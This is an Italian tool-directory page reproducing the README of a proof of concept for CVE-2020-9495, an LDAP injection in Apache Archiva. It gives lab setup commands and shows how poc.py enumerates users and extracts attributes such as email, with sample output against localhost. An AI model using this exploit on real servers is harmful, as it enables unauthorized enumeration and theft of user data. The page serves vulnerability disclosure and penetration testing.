Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-9495 | Kitploit
Strumenti/GitHubGitHub/ggolawski/cve-2020-9495
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubggolawski/cve-2020-9495

CVE-2020-9495

Vedi Repository
816 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-9495 PoC

La CVE-2020-9495 è una vulnerabilità di iniezione LDAP di gravità media in Apache Archiva precedente alla versione 2.2.5. Consente a un attaccante di recuperare qualsiasi valore di attributo LDAP degli utenti presenti sul server LDAP.

Dall'avviso ufficiale di Apache Archiva:

Fornendo valori speciali al modulo di login di Archiva, un attaccante è in grado di recuperare i dati degli attributi utente dal server LDAP connesso. Con determinati caratteri è possibile modificare il filtro LDAP usato per interrogare gli utenti sul server LDAP connesso. Misurando il tempo di risposta, è possibile recuperare dati arbitrari degli attributi dagli oggetti utente LDAP.

PoC

Lo script poc.py dimostra come un attaccante non autorizzato possa enumerare gli utenti su un server LDAP integrato con Archiva e recuperare il valore di qualsiasi attributo di qualsiasi utente.

Server di test Archiva locale

Salta questo passaggio se hai già un server Archiva con autenticazione LDAP abilitata.

  1. Scarica Archiva 2.2.4 ed estrailo

    root@kitploit:~
    $ wget https://archive.apache.org/dist/archiva/2.2.4/binaries/apache-archiva-2.2.4-bin.tar.gz
    $ tar -zxf apache-archiva-2.2.4-bin.tar.gz
    
  2. Esegui il server OpenLDAP

    root@kitploit:~
    $ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
    
  3. Importa gli utenti da users.ldif in LDAP

    root@kitploit:~
    $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
    
  4. Esegui il server Archiva

    root@kitploit:~
    $ bin/archiva console
    
  5. Abilita e configura l'autenticazione LDAP tramite interfaccia web

Enumera gli utenti

root@kitploit:~
$ ./poc.py --url http://127.0.0.1:8080
[INFO] Enumerating users from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
admin2
admin3
admin4
admin5
admin6
admin7
user1
user2
user3
user4

Recupera i valori degli attributi LDAP dell'utente admin1

root@kitploit:~
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr mail
[INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
[email protected]
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr givenName
[INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr sn
[INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
last
Scarica lo strumento